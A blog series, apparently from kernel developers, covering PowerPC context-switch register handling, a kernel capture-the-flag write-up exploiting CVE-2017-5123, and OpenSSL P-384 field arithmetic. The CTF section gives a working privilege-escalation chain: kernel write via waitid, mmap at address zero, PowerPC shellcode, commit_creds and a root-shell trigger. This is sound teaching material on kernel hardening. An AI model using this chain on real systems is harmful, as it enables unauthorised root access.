    if (cpu_has_feature(CPU_FTR_ALTIVEC) &&
        old_thread->vrsave != new_thread->vrsave)
        mtspr(SPRN_VRSAVE, new_thread->vrsave);
#endif
#ifdef CONFIG_SPE
    if (cpu_has_feature(CPU_FTR_SPE) &&
        old_thread->spefscr != new_thread->spefscr)
        mtspr(SPRN_SPEFSCR, new_thread->spefscr);
#endif
#ifdef CONFIG_PPC_BOOK3S_64
    if (cpu_has_feature(CPU_FTR_DSCR)) {
        u64 dscr = get_paca()->dscr_default;
        if (new_thread->dscr_inherit)
            dscr = new_thread->dscr;

        if (old_thread->dscr != dscr)
            mtspr(SPRN_DSCR, dscr);
    }

    if (cpu_has_feature(CPU_FTR_ARCH_207S)) {
        if (old_thread->bescr != new_thread->bescr)
            mtspr(SPRN_BESCR, new_thread->bescr);
        if (old_thread->ebbhr != new_thread->ebbhr)
            mtspr(SPRN_EBBHR, new_thread->ebbhr);
        if (old_thread->ebbrr != new_thread->ebbrr)
            mtspr(SPRN_EBBRR, new_thread->ebbrr);

        if (old_thread->fscr != new_thread->fscr)
            mtspr(SPRN_FSCR, new_thread->fscr);

        if (old_thread->tar != new_thread->tar)
            mtspr(SPRN_TAR, new_thread->tar);
    }

    if (cpu_has_feature(CPU_FTR_P9_TIDR) &&
        old_thread->tidr != new_thread->tidr)
        mtspr(SPRN_TIDR, new_thread->tidr);

    if (cpu_has_feature(CPU_FTR_DEXCR_NPHIE) &&
        old_thread->hashkeyr != new_thread->hashkeyr)
        mtspr(SPRN_HASHKEYR, new_thread->hashkeyr);
#endif

}

The gist is we first perform a series of mfspr operations, saving the SPR values of the currently running task into its associated task_struct. Then we do a series of mtspr operations to restore the desired values of the new task back into the CPU.

This procedure has two interesting optimisations, as explained by the commit that introduces save_sprs() and restore_sprs():

powerpc: Create context switch helpers save_sprs() and restore_sprs()

Move all our context switch SPR save and restore code into two helpers. We do a few optimisations:

  • Group all mfsprs and all mtsprs. In many cases an mtspr sets a scoreboarding bit that an mfspr waits on, so the current practise of mfspr A; mtspr A; mfspr B; mtspr B is the worst scheduling we can do.

  • SPR writes are slow, so check that the value is changing before writing it.

And that's basically it, as far as the implementation goes at least. When first investigating this, one question kept nagging me: why do we read these values here, instead of tracking them as they are set? I can think of several reasons this might be done:

  1. It's more robust to check at the time of swap what the current value is. You otherwise risk that a single inline assembly mtspr in a completely different part of the codebase breaks context switching. It would also mean that every mtspr would have to disable interrupts, lest the context switch occurs between the mtspr and recording the change in the task struct.
  2. It might be faster. Changing an SPR would need an accompanying write to the task struct. This is pessimistic if there are many such changes to the SPR between context switches.
  3. Even if you were to track every mtspr correctly, certain SPRs can be changed by userspace without kernel assistance. Some of these SPRs are also unused by the kernel, so saving them with the GPRs would be pessimistic (a waste of time if the task ends up returning back to userspace without swapping). For example, VRSAVE is an unprivileged scratch register that the kernel doesn't make use of.

Did you catch the issue with restore_sprs()?

If you paid close attention, you might have noticed that the previous task being passed to restore_sprs() is not the same as the one being passed to save_sprs(). We have the following instead

struct task_struct *__switch_to(struct task_struct *prev,
    struct task_struct *new)
{
    // ...
    new_thread = &new->thread;
    old_thread = &current->thread;
    // ...
    save_sprs(&prev->thread);             // using prev->thread
    // ...
    restore_sprs(old_thread, new_thread); // using old_thread (current->thread)
    // ...
    last = _switch(old_thread, new_thread);
    // ...
    return last;
}

What gives? As far as I can determine, we require that the prev argument to __switch_to() is always the currently running task (as opposed to being in some dedicated handler or ill-defined task state during the switch). And on PowerPC, we can access the currently running task's thread struct through the current macro. So, in theory, current->thread is an alias for prev->thread. Anything else wouldn't make sense here, as we store the SPR values into prev->thread, but make decisions about them in restore_sprs() based on the values saved in current->thread.

As for why we use both, it appears to be historical. We originally ran restore_sprs() after _switch(), which finishes swapping state from the original thread to the one being loaded in. This means our stack and registers are swapped out, so the prev variable we stored our current SPRs in is lost to us: it is now the prev of the task we just woke up. In fact, we've completely lost any handle to the task that just swapped itself out. Well, almost: that's where the last return value of _switch() comes in. This is a handle to the task that just went to sleep, and we were originally reloading old_thread based on this last value. However, a later patch moved restore_sprs() to above the _switch() call because of an edge case with newly created tasks, but the use of old_thread apparently remained.

Conclusion

Congratulations, you are now an expert on several of the finer details of context switching on PowerPC. Well, hopefully you learned something new and/or interesting at least. I definitely didn't appreciate a lot of the finer details until I went down the rabbit hole of differentiating threads, processes, and tasks, and the whole situation with prev vs old_thread.

Bonus tidbit

This is completely unrelated, but the kernel's implementation of doubly-linked lists does not follow the classic implementation, where a list node contains a next, previous, and data pointer. No, if you look at the actual struct definition you will find

struct hlist_node {
    struct hlist_node *next, **pprev;
};

which decidedly does not contain any data component.

It turns out that the kernel expects you to embed the node as a field on the data struct, and the data-getter applies a mixture of macro and compiler builtin magic to do some pointer arithmetic to convert a node pointer into a pointer to the structure it belongs to. Naturally this is incredibly type-unsafe, but it's elegant in its own way.
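
The data-getter in question is essentially the container_of() macro; a stripped-down version of the trick looks like this:

#include <stddef.h>

// Stripped-down container_of(): turn a pointer to an embedded member into
// a pointer to the structure containing it. The real kernel macro layers
// extra type checking on top of this.
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

struct item {
    int value;
    struct hlist_node node;   // the list node lives inside the data struct
};

// Given a struct hlist_node *n obtained while walking a list:
//   struct item *it = container_of(n, struct item, node);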


  1. While this is conceptually what happens, the kernel can apply tricks to avoid the overhead of copying everything up front. For example, memory mappings apply copy-on-write (COW) to avoid duplicating all of the memory of the parent process. But from the point of view of the processes, it is no longer shared. 

  2. Or you could say that what we just called a 'process' is a thread, and the 'process' is really a process group initially containing a single thread. In the end it's semantics that don't really matter to the kernel though. Any thread/process can create more threads that can share resources with the parent. 

  3. Changing the active memory mapping has no immediate effect on the running code due to address space quadrants. In the hardware, the top two bits of a 64 bit effective address determine what memory mapping is applied to resolve it to a real address. If it is a userspace address (top two bits are 0) then the configured mapping is used. But if it is a kernel address (top two bits are 1) then the hardware always uses whatever mapping is in place for process ID 0 (the kernel knows this, so reserves process ID 0 for this purpose and does not allocate it to any userspace tasks). So our change to the memory mapping only applies once we return to userspace, or try to access memory through a userspace address (through get_user() and put_user()). The hypervisor has similar quadrant functionality, but different rules. 

Beginner's first kernel CTF with CVE-2017-5123

The other kind of kernel hacking

Instead of writing mitigations, memory protections and sanitisers all day, I figured it'd be fun to get the team to try playing for the other team. It's a fun set of skills to learn, and it's a very hands-on way to understand why kernel hardening is so important. To that end, I decided to concoct a simple kernel CTF and enforce some mandatory fun. Putting this together, I had a few rules:

  • it should be exploiting a real world vulnerability
  • it should be on Power (since that's what we do around here)
  • it should be conceptually simple to understand (and not require knowledge of network stacks or sandboxes etc)
  • it's more important to be educational than to be realistic

So I threw something together and I think it did a decent job of meeting those targets, so let's go through it!

Stage 1: the bug

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
        infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;
    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
    }

    if (!err) {
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;

    user_access_begin();
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user((short)info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_access_end();
    return err;
Efault:
    user_access_end();
    return -EFAULT;
}

This is the implementation of the waitid syscall in Linux v4.13, released in September 2017. For our purposes it doesn't matter what the syscall is supposed to do - there's a serious bug here that will let us do very naughty things. Try and spot it yourself, though it may not be obvious unless you're familiar with the kernel's user access routines.

#define put_user(x, ptr)                        \
({                                  \
    __typeof__(*(ptr)) __user *_pu_addr = (ptr);            \
                                    \
    access_ok(_pu_addr, sizeof(*(ptr))) ?               \
          __put_user(x, _pu_addr) : -EFAULT;            \
})

This is put_user() from arch/powerpc/include/asm/uaccess.h. The implementation goes deeper, but this tells us that the normal way the kernel would write to user memory involves calling access_ok() and only performing the write if the access was indeed OK (meaning the address is in user memory, not kernel memory). As the name may suggest, unsafe_put_user() skips that part, and for good reason - sometimes you want to do multiple user accesses at once. With SMAP/PAN/KUAP etc enabled, every put_user() will enable user access, perform its operation then disable it again, which is very inefficient. Instead, patterns like in waitid above are rather common - enable user access, perform a bunch of "unsafe" operations and then disable user access again.

The bug in waitid is that access_ok() is never called, and thus there is no validation that the user provided pointer *infop is pointing to user memory instead of kernel memory. Calling waitid and pointing into kernel memory allows unprivileged users to write into whatever they're pointing at. Neat! This is CVE-2017-5123, summarised as "Insufficient data validation in waitid allowed an user to escape sandboxes on Linux". It's a primitive that can be used for more than that, but that's what its discoverer used it for, escaping the Chrome sandbox.
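
Exercising the primitive from userspace is then just a matter of pointing infop somewhere it has no business being; a hedged sketch (the kernel address is a placeholder):

// Sketch only: which bytes end up written depends on the wait result,
// and the target address passed in here is purely illustrative.
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

static void kernel_write(unsigned long kaddr)
{
    // With the access_ok() check missing, the unsafe_put_user() calls in
    // sys_waitid() write the siginfo fields straight to this address.
    syscall(SYS_waitid, P_ALL, 0, (void *)kaddr, WEXITED | WNOHANG, NULL);
}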

If you're curious, there's a handful of different writeups exploiting this bug for different things that you can search for. I suppose I'm now joining them!

A tangent: API design

Failing to enforce that a user-provided address to write to is actually in userspace is a hefty mistake, one that wasn't caught until after the code made it all the way to a tagged release (though the only distro release I could find with it was Ubuntu 17.10-beta2). Linux is big, complicated, fast-moving, and all that - there's always going to be bugs. It's not possible to prevent the entire developer base from ever making mistakes, but you can design better APIs so mistakes like this are much less likely to happen.

Let's have a look at the waitid syscall implementation as it is in upstream Linux at the time of writing.

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
        infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;

    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;

    if (!user_write_access_begin(infop, sizeof(*infop)))
        return -EFAULT;

    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user(info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_write_access_end();
    return err;
Efault:
    user_write_access_end();
    return -EFAULT;
}

Notice any differences? Not a lot has changed, but instead of an unconditional user_access_begin(), there's now a call to user_write_access_begin(). Not only have the user access functions been split into read and write (though whether there's actually read/write granularity under the hood depends on the MMU-specific implementation), but the _begin() function takes a pointer and the size of the write. And what do you think that's doing...

static __must_check inline bool
user_write_access_begin(const void __user *ptr, size_t len)
{
    if (unlikely(!access_ok(ptr, len)))
        return false;

    might_fault();

    allow_write_to_user((void __user *)ptr, len);
    return true;
}

That's right! The missing access_ok() check from v4.13 is now part of the API for enabling user access, so you can't forget it (without trying really hard). If there's something else you should be doing every time you call a function (i.e. access_ok() when calling user_access_begin()), it should probably just be part of the function, especially if there's a security implication.

This bug was fixed by adding in the missing access_ok() check, but it's very cool to see that bugs like this are now much less likely to get written.

Stage 2: the primitive

Before we do anything too interesting, we should figure out what we actually have here. We point our pointer at 0xc000000012345678 (an arbitrary kernel address) then take a look in gdb, revealing the following:

pwndbg> x/10 0xc000000012345678
0xc000000012345678:     17      0       1       0
0xc000000012345688:     2141    1001    1       0

So we know that we can at least set something to zero, and there's some potential for more mischief. We could fork() a lot to change the value of the PID to make our write a bit more arbitrary, but to not get too fancy I figured we should just see where we could get by setting something either to zero or to something non-zero.

A few targets came to mind. We could spray around where we think creds are located to try and overwrite the effective user ID of a process to 0, making it run as root. We could go after something like SELinux, aiming for flags like selinux_enabled and selinux_enforcing. I'm sure there's other sandbox-type controls we could try and escape from, too.

None of these were taking my CTF in the direction I wanted it to go (which was shellcode running in the kernel), so I decided to turn the realism down a notch and aim for exploiting a null pointer dereference. We'd map our shellcode to *0, induce a null pointer dereference in the kernel, and then our exploit would work. Right?

So we're just going to go for a classic privilege escalation. We start as an unprivileged user and end up as root. Easy.

Stage 3: the target

I found an existing exploit doing the same thing I wanted to do, so I just stole the target from that. It has some comments in French which don't really help me, but thankfully I found another version with some additional comments - in Chinese. Oh well. have_canfork_callback is a symbol that marks whether cgroup subsystems have a can_fork() callback that is checked when a fork is attempted. If we overwrite have_canfork_callback to be non-zero when can_fork is still NULL, then we win! We can reliably reproduce a null pointer dereference as soon as we fork().

I'm sure there's heaps of different symbols we could have hit, but this one has some nice properties. Any non-zero write is enough, we can trigger the dereference at a time in our control with fork(), and to cover our bases we can just set it back to 0 later.

In our case, we had debug info and a debugger, so finding where the symbol was located in memory is pretty easy. There's also /proc/kallsyms which is great if it's enabled. Linux on Power doesn't yet support KASLR which also saves us a headache or two here, and you can feel free to ask me why it's low on the priority list.

So now we have a null pointer dereference. Now let's get that doing something!

Stage 4: preparing the exploit

Virtual memory is one heck of a drug. If the kernel is going to execute from 0x0, we just need to mmap() to 0! Easy.

Well, it's not that easy. Turning any null pointer dereference into an easy attack vector is not ideal, so users aren't allowed to mmap to low address ranges, in our case, below PAGE_SIZE. Surely there's nothing in the kernel that would try to dereference a pointer + PAGE_SIZE? Maybe that's for a future CTF...

There's a sysctl for this, so in the actual CTF we just did sysctl -w vm.mmap_min_addr=0 and moved on for brevity. As I was writing this I decided to make sure it was possible to bypass this without cheating by making use of our kernel write primitive, and sure enough, it works! I had to zero out both mmap_min_addr and dac_mmap_min_addr symbols, the latter seemingly required for filesystem interactions to work post-exploit.
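
With the minimum address out of the way, placing the shellcode (coming up next) at address 0 is an ordinary mmap(); a sketch with error handling elided:

// Map a region at virtual address 0 and copy the shellcode into it.
// Requires vm.mmap_min_addr (and dac_mmap_min_addr) to be 0, as above.
#include <string.h>
#include <sys/mman.h>

static void map_shellcode(const unsigned char *code, size_t len)
{
    void *zero_page = mmap((void *)0, 0x10000,
                           PROT_READ | PROT_WRITE | PROT_EXEC,
                           MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    memcpy(zero_page, code, len);   // the kernel will later fetch from 0x0
}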

So now we can trigger a null pointer dereference in the kernel and we can mmap() our shellcode to 0x0, we should probably get some shellcode. We want to escalate our privileges, and the easiest way to do that is the iconic commit_creds(prepare_kernel_cred(0)).

prepare_kernel_cred() is intended to produce a credential for a kernel task. Passing 0/NULL gets you the same credential that init runs with, which is about as escalated as our privileges can get. commit_creds() applies the given credential to the currently running task - thus making our exploit run as root.

As of somewhat recently it's a bit more complex than that, but we're still back in v4.13, so we just need a way to execute that from a triggered null pointer dereference.

Stage 5: the shellcode

The blessing and curse of Power being a niche architecture is that it's hard to find existing exploits for. Perhaps lacking in grace and finesse, but effective nonetheless, is the shellcode I wrote myself:

    static const unsigned char shellcode[] = {
        0x00, 0x00, 0xc0, 0x3b, // li r30, 0
        0x20, 0x00, 0x9e, 0xe9, // ld r12,32(r30)
        0x00, 0x00, 0xcc, 0xfb, // std r30,0(r12)
        0x18, 0x00, 0x9e, 0xe9, // ld r12,24(r30)
        0xa6, 0x03, 0x89, 0x7d, // mtctr r12
        0x20, 0x04, 0x80, 0x4e, // bctr
    };

After the CTF I encouraged everyone to try writing their own shellcode, and no one did, which I will take as a sign that mine is flawlessly designed.

First we throw 0 into r30, which sounds like a register we'll get away with clobbering. We then load the doubleword at offset 32 from r30 into r12 (and r30 is 0, so this is address 32). Then we store the value of r30 (which is 0) to the address in r12 - writing zero to the address found at *32.

Next, we replace the contents of r12 with the value contained at address 24, move that value into the count register, and branch to the count register - redirecting execution to the address found at *24.

I wrote it this way so participants would have to understand what the shellcode was trying to do to be able to get any use out of it. It expects two addresses to be placed immediately after it terminates and it's up to you to figure out what those addresses should be!

In our case, everyone figured out pretty quickly that *24 should point at our very classic privesc:

    void get_root() {
        if (commit_creds && prepare_kernel_cred)
            commit_creds(prepare_kernel_cred(0));
    }

Addresses for those kernel symbols need to be obtained first, but we're experts at that now. So we add in:

    *(unsigned long *)24 = (unsigned long)get_root;

And that part's sorted. How good is C?

No one guessed what address we were zeroing, though, and the answer is have_canfork_callback. Without resetting it, the kernel will keep attempting to execute from address 0 on every fork, which we don't want - we only need it to do that once!

So we wrap up with

    *(unsigned long *)32 = have_canfork_callback;

and our shellcode's ready to go!
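
With the addresses filled in, the userspace side of the exploit is small: map the shellcode, flip have_canfork_callback with the write primitive, then fork() to walk the kernel into our code. A rough sketch (structure and names are mine, not the CTF exploit's):

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    /* Once the shellcode is mapped at 0 and have_canfork_callback is
     * non-zero, the next fork() hits the NULL can_fork callback and the
     * shellcode runs get_root() in our context. */
    static void trigger(void)
    {
        /* The fork itself may or may not succeed depending on what the
         * kernel makes of get_root()'s return value - either way, by the
         * time it returns, commit_creds() has run for us. */
        pid_t child = fork();

        if (child == 0)
            exit(0);

        if (getuid() == 0) {
            printf("got root, spawning shell\n");
            execl("/bin/sh", "sh", (char *)NULL);
        }
        printf("exploit failed, still uid %d\n", getuid());
    }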

Stage 6: it doesn't work

We've had good progress so far - we needed a way to get the kernel to execute from address 0 and we found a way to do that, and we needed to mmap to 0 and we found a way to do that. And yet, running the exploit doesn't work. How come?

Unable to handle kernel paging request for instruction fetch
Faulting instruction address: 0x00000000
Oops: Kernel access of bad area, sig: 11 [#2]

The MMU has ended our fun. KUEP is enabled (the equivalent of SMEP on x86 or PXN on ARM), so the MMU enforces that the kernel can't execute from user addresses. I gave everyone a bit of a trick question here - how can you get around this purely from the qemu command line?

The way I did it wasn't to pass nosmep (and I'm not even sure that was implemented for powerpc in v4.13 anyway), it was to change from -cpu POWER9 to -cpu POWER8. Userspace execution prevention wasn't implemented in the MMU until POWER9, so reverting to an older processor was a cheeky way to get around it.

Stage 7: victory!

Putting all of that together, we have a successful privilege escalation from attacking the kernel.

/ $ ./exploit 
Overwriting mmap_min_addr...
Overwriting dac_mmap_min_addr...
Overwriting have_canfork_callback...
Successfully acquired root shell!
/ # whoami
root

It's wild to think that even an exploit this simple would have been possible in the "real world" back in 2017, which really highlights the value of kernel hardening! It made for a good introduction to kernel exploitation for me and my team, and wasn't too contrived for the sake of simplicity.

Whether you're a beginner or an expert at kernel exploitation (or somewhere vaguely in the middle like me), I hope you found this interesting. There's lots of great PoCs, writeups and papers out there to learn from and CTFs to try if you want to learn more!

Going out on a Limb: Efficient Elliptic Curve Arithmetic in OpenSSL

So I've just managed to upstream some changes to OpenSSL for a new strategy I've developed for efficient arithmetic used in secp384r1, a curve prescribed by NIST for digital signatures and key exchange. In spite of its prevalence, its implementation in OpenSSL has remained somewhat unoptimised, even as less frequently used curves (P224, P256, P521) each have their own optimisations.

The strategy I have used could be called a 56-bit redundant limb implementation with Solinas reduction. Without too much micro-optimisation, we get ~5.5x speedup over the default (Montgomery Multiplication) implementation for creation of digital signatures.

How is this possible? Well first let's quickly explain some language:

Elliptic Curves

When it comes to cryptography, it's highly likely that those with a computer science background will be familiar with ideas such as key exchange and private-key signing. The stand-in asymmetric cipher in a typical computer science curriculum is RSA. However, the heyday of Elliptic Curve ciphers has well and truly arrived, and their operation seems no less mystical than when they were just a toy for academia.

The word 'Elliptic' may seem to imply continuous mathematics. As a useful cryptographic problem, though, we are fundamentally just interested in the algebraic properties of these curves, whose points are elements of a finite field. Irrespective of the underlying finite field, the algebraic properties of the elliptic curve group can be shown to exist by an application of Bézout's Theorem. The group operator on points of an elliptic curve, for a particular choice of field, is built from lines intersecting the curve once, twice or thrice: these intersections grant notions of addition and doubling for the points involved, with the 'point at infinity' acting as the group identity. A closed form exists for computing a point double/addition in arbitrary fields (different closed forms apply depending on the field's characteristic, and the same closed form applies for all large prime fields).

Our algorithm uses a field of the form \(\mathbb{F}_p\), that is, the unique field with \(p\) (a prime) elements. The most straightforward construction of this field is arithmetic modulo \(p\). The other finite fields used in practice in ECC are of the form \(\mathbb{F}_{2^m}\) and are sometimes called 'binary fields' (representable as polynomials with binary coefficients). Their field structure is also used in AES through byte substitution, implemented by inversion in \(\mathbb{F}_{2^8}\).

From a performance perspective, great optimisations can be made by implementing efficient fixed-point arithmetic specialised to reduction modulo a single prime constant, \(p\). From here on out, I'll be speaking from this abstraction layer alone.

Limbs

We wish to multiply two \(m\)-bit numbers, each of which is represented with \(n\) 64-bit machine words in some way. Let's suppose just for now that \(n\) divides \(m\) neatly; then the quotient \(d = m/n\) is the minimum number of bits in each machine word that will be required for representing our number. Suppose we use the straightforward representation whereby the least significant \(d\) bits are used for storing parts of our number, which we better call \(x\) because this is crypto and descriptive variable names are considered harmful (apparently).

$$x = \sum_{k = 0}^{n-1} 2^{dk} l_k$$

If we then drop the requirement for each of our \(n\) machine words (also referred to as a 'limb' from hereon out) to have no more than the least significant \(d\) bits populated, we say that such an implementation uses 'redundant limbs', meaning that the \(k\)-th limb has high bits which overlap with the place values represented in the \((k+1)\)-th limb.
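
To make that concrete, a sketch of the representation (the names and macros here are illustrative, not the exact ones used in OpenSSL) might look like:

    #include <stdint.h>

    typedef unsigned __int128 uint128_t;    /* headroom for limb products */
    typedef uint64_t limb;

    #define NLIMBS    7                     /* ceil(384 / 56) */
    #define LIMB_BITS 56
    #define LIMB_MASK ((1ULL << LIMB_BITS) - 1)

    typedef limb      felem[NLIMBS];             /* a field element, possibly redundant */
    typedef uint128_t widefelem[2 * NLIMBS - 1]; /* holds a full felem x felem product */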

Multiplication (mod p)

The fundamental difficulty with making modulo arithmetic fast is to do with the following property of multiplication.

Let \(a\) and \(b\) be \(m\)-bit numbers, then \(0 \leq a < 2^m\) and \(0 \leq b < 2^m\), but critically we cannot say the same about \(ab\). Instead, the best we can say is that \(0 \leq ab < 2^{2m}\). Multiplication can in the worst case double the number of bits that must be stored, unless we can reduce modulo our prime.

If we begin with non-redundant 56-bit limbs, then for \(a\) and \(b\) not too much larger than \(2^{384} > p_{384}\) that are 'sufficiently reduced', we can multiply our limbs with the following ladder, so long as we are capable of storing the resulting sums without overflow.

    /* and so on ... */

    out[5] = ((uint128_t) in1[0]) * in2[5]
           + ((uint128_t) in1[1]) * in2[4]
           + ((uint128_t) in1[2]) * in2[3]
           + ((uint128_t) in1[3]) * in2[2]
           + ((uint128_t) in1[4]) * in2[1]
           + ((uint128_t) in1[5]) * in2[0];

    out[6] = ((uint128_t) in1[0]) * in2[6]
           + ((uint128_t) in1[1]) * in2[5]
           + ((uint128_t) in1[2]) * in2[4]
           + ((uint128_t) in1[3]) * in2[3]
           + ((uint128_t) in1[4]) * in2[2]
           + ((uint128_t) in1[5]) * in2[1]
           + ((uint128_t) in1[6]) * in2[0];

    out[7] = ((uint128_t) in1[1]) * in2[6]
           + ((uint128_t) in1[2]) * in2[5]
           + ((uint128_t) in1[3]) * in2[4]
           + ((uint128_t) in1[4]) * in2[3]
           + ((uint128_t) in1[5]) * in2[2]
           + ((uint128_t) in1[6]) * in2[1];

    out[8] = ((uint128_t) in1[2]) * in2[6]
           + ((uint128_t) in1[3]) * in2[5]
           + ((uint128_t) in1[4]) * in2[4]
           + ((uint128_t) in1[5]) * in2[3]
           + ((uint128_t) in1[6]) * in2[2];

    /* ... and so forth */

This is possible if we back each of the 56-bit limbs with a 64-bit machine word, with products being stored in 128-bit machine words. The numbers \(a\) and \(b\) were able to be stored with 7 limbs, whereas we use 13 limbs for storing the product. If \(a\) and \(b\) were stored non-redundantly, then each of the output (redundant) limbs must contain values less than \(6 \cdot 2^{56} \cdot 2^{56} < 2^{115}\), so there is no possibility of overflow in 128 bits. We even have room spare to do some additions/subtractions in cheap, redundant limb arithmetic.
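
That spare room is exactly what makes those additions essentially free: they are just limb-wise operations with no carry handling at all, provided we keep track of how large the limbs may have grown. A sketch, operating on 13-limb products with the uint128_t type used in the ladder above:

    /* Redundant limb addition: no carries, just add limb by limb. */
    static void felem_sum(uint128_t out[13], const uint128_t in[13])
    {
        for (int i = 0; i < 13; i++)
            out[i] += in[i];
    }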

But we can't keep doing our sums in redundant limb arithmetic forever; we must eventually reduce. Doing so may be expensive, and so we would rather reduce only when strictly necessary!

Solinas-ish Reduction

Our prime is a Solinas (Pseudo/Generalised-Mersenne) Prime. Mersenne Primes are primes expressible as \(2^m - 1\). This can be generalised to low-degree polynomials in \(2^m\). For example, another NIST curve uses \(p_{224} = 2^{224} - 2^{96} + 1\) (a 224-bit number) where \(p_{224} = f(2^{32})\) for \(f(t) = t^7 - t^3 + 1\). The simpler the choice of polynomial, the simpler the modular reduction logic.

Our choice of \(t\) is \(2^{56}\). Wikipedia describes the ideal case for Solinas reduction, where the bit width of the prime is divisible by \(\log_2{t}\), but that is not our scenario. We choose 56 bits for some pretty simple realities of hardware: 56 is less than 64 (the standard machine word size) but not by too much, and the difference is a whole byte (\(64-56=8\)). Let me explain:

Just the Right Amount of Reduction (mod p)

Let's first describe the actual prime that is our modulus.

$$p_{384} = 2^{384} - 2^{128} - 2^{96} + 2^{32} - 1$$

Yuck. This number is so yuck, in fact, that no one has so far managed to upstream a Solinas reduction method for it in OpenSSL, in spite of secp384r1 being the preferred curve for ECDH (Elliptic Curve Diffie-Hellman key exchange) and ECDSA (Elliptic Curve Digital Signature Algorithm) by NIST.

In 56-bit limbs, we would express this number so:

Let \(f(t) = 2^{48} t^6 - 2^{16} t^2 - 2^{40} t + (2^{32} - 1)\), then observe that all coefficients are smaller than \(2^{56}\), and that \(p_{384} = f(2^{56})\).

Now let \(\delta(t) = 2^{16} t^2 + 2^{40} t - 2^{32} + 1\), consider that \(p_{384} = 2^{384} - \delta(2^{56})\), and thus \(2^{384} \equiv \delta(2^{56}) \mod{p_{384}}\). From now on let's call \(\delta(2^{56})\) just \(\delta\). Thus, 'reduction' can be achieved as follows for suitable \(X\) and \(Y\):

$$ab = X + 2^{384} Y \equiv X + \delta Y \mod{p_{384}}$$

Calculating \(\delta Y\)

First Substitution

First make a choice of \(X\) and \(Y\). The first thing to observe here is that this choice can actually be made in a large number of ways! We choose:

$$X_1 = \sum_{k=0}^8\texttt{in[k]} t^k$$
$$Y_1 = 2^8 t^2 \sum_{k=9}^{12}\texttt{in[k]} t^{k-9} = 2^8 \sum_{k=9}^{12}\texttt{in[k]} t^{k-7}$$

'Where does the \(2^8 t^{2}\) come from?' I hear you ask. See \(t^9 = t^2 \cdot t^7 = t^2 (2^8 \cdot 2^{384}) \equiv (2^8 t^2) \delta \mod{f(t)}\). It's clear to see that the place value of in[9] ... in[12] is greater than \(2^{384}\).

I'm using the subscripts here because we're in fact going to do a series of these reductions to reach a suitably small answer. That's because our equation for reducing \(t^7\) terms is as follows:

$$t^7 \equiv 2^8\delta \equiv 2^{24} t^2 + 2^{48} t + (-2^{40} + 2^8) \mod{f(t)}$$

Thus reducing in[12] involves computing:

$$\texttt{in[12]} t^{12} = \texttt{in[12]} (t^5)(t^7) \equiv 2^8\delta \cdot \texttt{in[12]} t^5 \mod{f(t)}$$

But \(\delta\) is a degree two polynomial, and so our numbers can still have two more limbs than we would want them to have. To be safe, let's store \(X_1 + \delta Y_1\) in accumulator limbs acc[0] ... acc[8] (this will at first appear to be one more limb than necessary), then we can eliminate in[12] with the following logic.

    /* assign accumulators to begin */
    for (int i = 0; i < 9; i++)
        acc[i] = in[i];

    /* X += 2^128 Y */
    acc[8] += in[12] >> 32;
    acc[7] += (in[12] & 0xffffffff) << 24;

    /* X += 2^96 Y */
    acc[7] += in[12] >> 8;
    acc[6] += (in[12] & 0xff) << 48;

    /* X += (-2^32 + 1) Y */
    acc[6] -= in[12] >> 16;
    acc[5] -= ((in[12] & 0xffff) << 40);
    acc[6] += in[12] >> 48;
    acc[5] += (in[12] & 0xffffffffffff) << 8;

Notice that for each term in \(\delta = 2^{128} + 2^{96} - 2^{32} + 1\) we do two additions/subtractions. This splitting of operands minimises the final size of the numbers and prevents over/underflows. Consequently, we need an acc[8] to receive the high bits of our in[12] substitution given above.

Second Substitution

Let's now try to eliminate acc[7] and acc[8] through substitution. Let

$$X_2 = \sum^{6}_{k=0}\texttt{acc[k]}t^k $$
$$Y_2 = 2^8(\texttt{acc[7]} + \texttt{acc[8]} t)$$

But this time, \(\delta Y_2\) is a number that can comfortably take up just five limbs, so we can update acc[0], ..., acc[5] in place.
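
As a sketch of what that looks like for acc[7] (mirroring the in[12] logic above, just shifted down five limbs since \(t^{12} = t^5 \cdot t^7\); acc[8] is handled the same way one limb higher, and the underflow-avoiding constants discussed later are omitted here):

    /* X += 2^128 Y */
    acc[3] += acc[7] >> 32;
    acc[2] += (acc[7] & 0xffffffff) << 24;

    /* X += 2^96 Y */
    acc[2] += acc[7] >> 8;
    acc[1] += (acc[7] & 0xff) << 48;

    /* X += (-2^32 + 1) Y */
    acc[1] -= acc[7] >> 16;
    acc[0] -= ((acc[7] & 0xffff) << 40);
    acc[1] += acc[7] >> 48;
    acc[0] += (acc[7] & 0xffffffffffff) << 8;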

Third Substitution

Finally, let's reduce all the high bits of acc[6]. Since acc[6] has place value \(t^6 = 2^{336}\), we wish to reduce all but its least significant \(384 - 336 = 48\) bits.

